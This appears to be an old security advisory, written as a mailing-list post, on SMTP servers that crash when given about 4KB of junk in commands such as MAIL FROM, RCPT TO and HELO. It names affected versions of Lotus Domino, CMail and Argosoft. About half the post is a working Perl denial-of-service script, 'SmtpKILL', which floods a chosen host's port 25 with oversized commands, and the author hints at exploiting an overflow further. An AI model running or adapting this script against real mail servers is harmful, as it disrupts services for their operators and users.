Some SMTP Servers have problems handling with "mail from: 4k_junk" or just "4k_of_junk". Well I tryed this in : * Lotus Domino ESMTP Services running Version 5.0.3 (Intl) and smtp died also after mail from: someone@4k_junk * Lotus Domino ESMTP version 5.0.2 (Intl) is also vulnerable to this. * I also tryed this against Version 5.0.2c (Intl) without success in DOS so I assume that 5.0.2c(Intl) is not vulnerable. * Merak Server Version 2.10.270 is not also vulnerable. * CMail Server version 2.4.6 is not vulnerable to mail from: someone@4k_junk BUT is vulnerable to something_4k_junk ! In fact this software even logs "mail from: someone@4k_junk" as a DOS attempt but crashes when you just send something_4k_junk ! * Argosoft Mail Server version 1.2.1.0 doesnīt crash with "mail from: someon@4k:_junk" but after some messages it will log : Error: Access violation at address 00459CBB in module 'MAILSERVER.EXE'. Read of address FFFFFFFF but it will continue to serve :) Maybe we could make something funny with this overflow (?) ;))) * Many others where I havenīt tryed this...? I am attaching a demonstration code (perl) for those who want to check any other servers that might be vulnerable to this. smiler@vxd.org #!/usr/bin/perl # Need net::telnet to run # Expl0it By smiler@vxd.org # Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3 # CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0 # and probably many others that I hadnīt chance to explore. # I wrote this after Michal Zalewski brought this issue in BugTraq. # Cheers 351 and FractalG :) use Net::Telnet; print "SmtpKILL By smiler\@vxd.org\n"; if (not $ARGV[1]) { print qq~ Usage : smtpkill.pl Type of attack : type 1 = long mail from: someone\@4k_of_junk type 2 = long rcpt to: someone\@4k_of_junk type 3 = long helo longdomain_with_4k_of_junk type 4 = long undefined command (4k_of_junk) type 5 = long help 4k_of_junk type 6 = long mail from: and mail to: Host that you want to DOS, Ip or Domain will be ok. Example Usage : smtpkill.pl 5 127.0.0.1 ~; exit;} $type=$ARGV[0]; $target=$ARGV[1]; print "TYPE ATTACK: $type\n"; print "TARGET : $target\n"; for ($i=4096;$i<5096;$i++) { $obj=Net::Telnet->new( Host => "$target",Port => 25); if ($type=~ "1") { $helo="helo ptrulez"; $from="mail from: v0v0@". 'ptrulez' x $i; $rcpt="rcpt to: v0v0\@v0v0.pt"; } if ($type=~ "2") { $helo="helo ptrulez"; $from="mail from: v0v0\@v0v0.pt"; $rcpt="rcpt to: v0v0@". 'ptrulez' x $i; } if ($type=~ "3") { $helo="helo ". 'ptrulez' x $i; $from="mail from: v0v0\@v0v0.pt"; $rcpt="rcpt to: v0v0\@v0v0.pt"; } if ($type=~ "4") { $helo="havesomefun". 'ptrulez' x $i; } if ($type=~ "5") { $helo="help ". 'ptrulez' x $i; } if ($type=~ "6") { $helo="helo ptrulez"; $from="mail from: ". 'ptrulez' x $i; $rcpt="rcpt to: ". 'ptrulez' x $i; } print "$helo\n";$obj->print("$helo"); print "$from\n";$obj->print("$from"); print "$rcpt\n";$obj->print("$rcpt"); $obj->close; }